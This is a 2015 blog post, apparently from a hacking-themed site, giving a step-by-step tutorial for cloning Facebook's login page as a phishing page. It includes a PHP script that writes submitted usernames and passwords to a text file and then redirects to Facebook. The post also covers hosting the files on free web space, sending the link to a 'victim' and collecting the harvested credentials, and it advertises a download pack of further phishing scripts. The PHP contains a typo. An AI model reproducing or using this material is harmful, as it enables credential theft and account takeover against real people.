AnonDevil

Wednesday, 18 March 2015

How To Hack Facebook Account Using Phishing

How To Hack Facebook Account Using Phishing Page (Fake Page)
Steps To Creat Phishing Page:

1. Go To The Facebook Page , And Then Right Click On The Page, You Will See The Option VIEW SOURCE PAGE , Click On That.

2. Now A New Tab Will Open Which Contaun A Source Code, Select All The Stuff And Paste It In A Notepad.

3. Now Open The Notepad And Press CTRL + F, And Type ACTION. 

4. You Will Have To Find A Text Which Looks Like...
action="https://www.facebook.com/login.php?login attempt=1"

5. Now Change The Text To post.php. Then It Will Look Like...
action="post.php"

6.Now Save It On your Desktop Woth the Name index.htm , Not index.html ,Remember.

7. Now Your Phishing Page Is Ready. It Will Look Like A Facebook Login Page.

8. Open A New Notepad And Save The Given Data With The Name post.php 

<?php
header ('Location:http://www.facebook.com/');
$handle = fopen("username.txt","a");
foreach($_POST as $variable => $value) {
fwrite)handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

9. You Have 2 Files Now One Is index.htm And Another Is post.php , Remember File Extension Is Important.

10. Now You Have To Upload It In A WEB HOSTING Site , I Prefer You To Use 000webhosting or else My3gb.

11. I Prefer You To Use 000webhost Because It Will Be Easy To Use

12. You Have To Make A Account In That.

13. Now Go CONTROL PANEL , Then On FILE MANAGER .

14. After That A New Window Will Pop-up, Now Go To public_html .

15. Delete The File Named Default.php , After That Upload 2 Files index.htm And post.php One By One.

16. Now The Last Step Click On View Of index.htm It Will Look Same As Facebook Page.

17. Copy The URL Of That Page And Send this Link To Your Victim, When Your Victim Try To Log In To It With The Username And Password. The Page Redirectly Connect To Facebook. And You Will Be Now Able To See His Password.

18. Open Your 000webhost Account And Go To  File Manager Then Public_html , Here You Find A New File Named username.txt

19. Click On View Now You Will Have Your Friend's Password And Email Id.

You Can Download Phishing Script's From This Download Link: 34 In 1 Mega Pack Of Phishing

Hacker: Xyb3r D3vil

Team: AnonDevilz

Comment If You Face Any Problem... 

0 comments:

Post a Comment